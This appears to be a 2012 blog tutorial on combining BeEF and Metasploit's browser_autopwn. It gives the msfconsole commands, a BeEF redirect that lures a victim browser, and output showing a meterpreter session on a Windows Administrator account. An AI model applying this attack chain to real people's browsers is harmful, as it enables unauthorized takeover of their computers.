• Slack Space
    Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
  • Attack Vector BeEF + Metasploit
    Hey guys,, In the night, i will be writting tutorial about Attack Vektor on BeEF+Metasploit. Yesterday, i was written first about BeEF and ...
  • Vulnerability Assessment with Nessus + Exploit
    1. first you have to search or scan host that will be targeted 2. Start the the nessus, make sure the service has gone the way of open th...

2/27/12

BeEF + Metasploit

Now, i want to exploit using Metasploit and BeEF (Browser Exploitation). I'm using backtrack 5.

1. Open apps > Exploitations Tools > Social Engineering Tools > BEEF XSS Framework > BeEF-ng





2. Open the url http://127.0.0.1:3000/ui/panel on Backtrack




3. Please login username (beef) and password (beef) then enter.













4. Then, just click "here"





5. Open url http://127.0.0.1:3000/demos/butcher/index.html in victim target and change ip address to be http://192.168.43.1:3000/demos/butcher/index.html. But before that, you must prepare msfconsole.

6. Running msfconsole , open terminal and type

  root@bt:~# msfconsole




7. Searching auxiliary browser , type :

msf > search browser 




8. I'm using auxiliary/server/browser_autopwn, type : 


msf > use auxiliary/server/browser_autopwn


  
 9. Look at that, any option after i typed show options. Now, setting the localhost (LHOST)

msf  auxiliary(browser_autopwn) > set lhost 192.168.43.1


10. Setting PAYLOAD, u can do it typing on :

msf  auxiliary(browser_autopwn) > set PAYLOAD_WIN32

msf  auxiliary(browser_autopwn) > set PAYLOAD_JAVA


11. Back to step 5, open url http://192.168.43.1:3000/demos/butcher/index.html on your victim target.




12. Check your browser exploitation





BeEF was detected the victim target.

13. Back to msfconsole is still running. Just type exploit

 msf  auxiliary(browser_autopwn) > exploit




please wait until proccess stoping self.



Look at  Local IP: http://192.168.1.8:8080/5wz6Xo this address will be used for exploiting target. But change the ip address to be http://192.168.43.1:8080/5wz6Xo (localhost)


14. Go to browser exploitation (BeEF). There are any optional. In this tutorial i'm using command > browser > Site Redirect



On the right side,




you can fill in Page title up to you. In Redirect URL you must fill in with metasploit url direct (step 13).


15. On the bottom right there are a button "Execute"


16. DO IT........Execute..!!


17. Oh yeaaaahh.....Great. Now you just type sessions -l 

[+] Migrating to 2176
[+] Successfully migrated to process
sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-3310268A22\Administrator @ ROOT-3310268A22  192.168.43.1:3333 -> 192.168.43.128:1199




and then type sessions -i 1

msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


  
Good Luck. :)

at
Labels: , , , ,

1 comment:

Subscribe to: Post Comments (Atom)

Slack Space

Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...